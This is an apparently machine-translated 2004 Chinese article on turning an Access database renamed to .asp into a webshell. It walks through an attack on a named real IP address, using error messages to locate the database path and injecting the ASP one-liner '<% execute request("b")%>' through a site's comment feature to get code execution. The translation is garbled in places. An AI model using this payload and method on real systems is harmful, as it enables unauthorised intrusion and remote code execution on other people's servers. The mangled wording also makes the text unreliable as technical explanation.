Author: SuperHei · Lilo article in Nature: Original release date: 2004-09-16 possible with the development of network security technology bar, are improving the quality of administrators, when using access asp system, the database is not being Download, change MDB to ASP or ASA. Don't say it directly to the suffix, you can directly download the tools and other tools. In fact, you have opened the door for the invaders. Intruders can get WebShell directly using the ASP / ASA for the suffix database. One. Everyone knows that <%%> is the flag of the ASP file, that is, an ASP file will only perform code between <%%>, all data of the Access ASP web system is stored in the database file (MDB File), since the manager changes the MDB file to an ASP file, if we submit it contains <%%>, then the code between <%%> is performed when we access this ASP database. This leads us that we only submit malicious code to the database, then the ASP suffix database is our webhell. two. The example is just a goal, first of all our branches, see if the ASP suffix database: http://220.170.151.103/test/dlog\showlog.asp? Cat_id = 5 & log_id = 210 Returns:
Microsoft VBScript compile error error '800A03F6' missing 'end' /iishelp/common/500-100.asp, line 242 Microsoft Jet Database Engine error '80004005' D: /LOG_MDB/)dlog_mdb).asp 'is not a valid route of. Determine if the path name spell is correct, and whether it is connected to the server stored. / Test/conn.asp, line 18 we submit: http://220.170.151.103/test/dlog/log_mdb/%29dlog_mdb%29.asp returns a bunch of garbled, so we can directly download the database directly with internet expressions (We don't discuss here). We return to the homepage to see there is a "netizen comment" function. We register a user, send a comment:
<% Execute Request ("B")%> So we write the ASP code: <% execute request ("b")%>, then the database: is our WebShell. Submitted: http://220.170.151.103/test/dlog/log_mdb/%29dlog_mdb%29.asp In the last line we see:
/iishelp/common/500-100.asp, line 242 Microsoft VBScript runtime error error '800A000D' type does not match: 'Execute' /test/dlog/log_mdb/)dlog_mdb).asp, line 1266 Haha, our insertion The code is running. As shown below:
